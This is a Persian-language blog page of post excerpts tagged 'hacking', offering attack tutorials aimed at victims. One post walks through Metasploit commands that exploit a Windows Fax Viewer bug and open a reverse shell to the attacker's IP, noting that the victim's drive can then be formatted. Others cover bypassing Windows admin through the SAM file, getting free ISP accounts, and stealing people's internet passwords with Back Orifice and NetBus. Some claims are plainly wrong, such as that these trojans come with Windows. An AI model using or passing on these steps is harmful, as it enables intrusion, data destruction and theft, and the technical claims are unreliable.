s.c.i.t

science of computer and infomation technology

s.c.i.t

science of computer and infomation technology

s.c.i.t
تبلیغات
Blog.ir بلاگ، رسانه متخصصین و اهل قلم، استفاده آسان از امکانات وبلاگ نویسی حرفه‌ای، در محیطی نوین، امن و پایدار bayanbox.ir صندوق بیان - تجربه‌ای متفاوت در نشر و نگهداری فایل‌ها، ۳ گیگا بایت فضای پیشرفته رایگان Bayan.ir - بیان، پیشرو در فناوری‌های فضای مجازی ایران
طبقه بندی موضوعی

۶ مطلب با کلمه‌ی کلیدی «هک کردن» ثبت شده است

الف - عمومی ترین نوع حمله روی یک ماشین ورک استیشن به دست آوردن توانایی راهبری (Admin در ویندوز Root در سیستم های اوپن سورس مثل لینوکس) سیستم است.
معمولا در ویندوز ورک استیشن هکرها با تغییرنام (Rename) یا پاک کردن پوشه SAM در آدرس زیر به راهبری ماشین دست می یابند.


C:\ winnt\ system32\ config\ SAM
و در لینوکس با پرامت تحت Lilo و تایپ کلمه Linuxs می توان به توانایی راهبری سیستم بعنوان یک هکر دسترسی یافت.

  • امیر محمد یوسفی

در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد که قبلآ نحوه ی کار و دستورات آن در سایت آموزش داده شده لینک دریافت Metasploit framework-2.5 - توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من http://217.216.30.40 باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن

بزنید set PAYLOAD win32_reverse و بعد ان
بزنید set HTTPHOST 217.216.30.40 و بعد آن
بزنید set LHOST 217.216.30.40
و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک http://217.216.30.40:8080 را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید

  • امیر محمد یوسفی

 با چند روش جالب برای هک کردن ISP که می توانید اکونت رایگان بدست آورید برای شما عزیزان بیان می کنم.

در ابتدای کار باید برای شما عزیزان طریقه حدس زدن یک یوز را بیان کنم. دوستان خوب این مطلب را یاد بگیرید چون در ادامه کار خیلی به دردتان می خورد.

  • امیر محمد یوسفی

شما با این آموزش می توانید بدون ارسال فایل و کاملا باکلاس پسورد اینترنت مردم رو هک کنید.اینم بگم که این کار خیلی بی رحمانه هست و به من هیچ ربطی نداره!!!!!!!!
ما به این برنامه ها احتیاج داریم که همش تو خود ویندوز هست: BACK ORFICE. Wingate.Netbus.Telnet

  • امیر محمد یوسفی

کلا روش های زیادی برای پیدا کردن پسورد ادمین ویندوز های NT 2K & XP وجود داره اما من ترجیح می دم از روش کرک SaM پسورد را بدست بیارم متاسفانه بزرگ ترین ضعف امنیتی مایکروسافت در SaM بر می گرده به Encrypt این فایل هاکه با متد 64bit انکریپت و یا بهتره بگم Hash شده و این به کرکرها اجازه رو می ده که با یک مقدار دقت حتی بتونه به خوبی هارد دیسک هایی را که با Format NTFS قالب بندی شده و SaM فایل ها Encode شده اند رو Decode کنند!!

  • امیر محمد یوسفی
  • امیر محمد یوسفی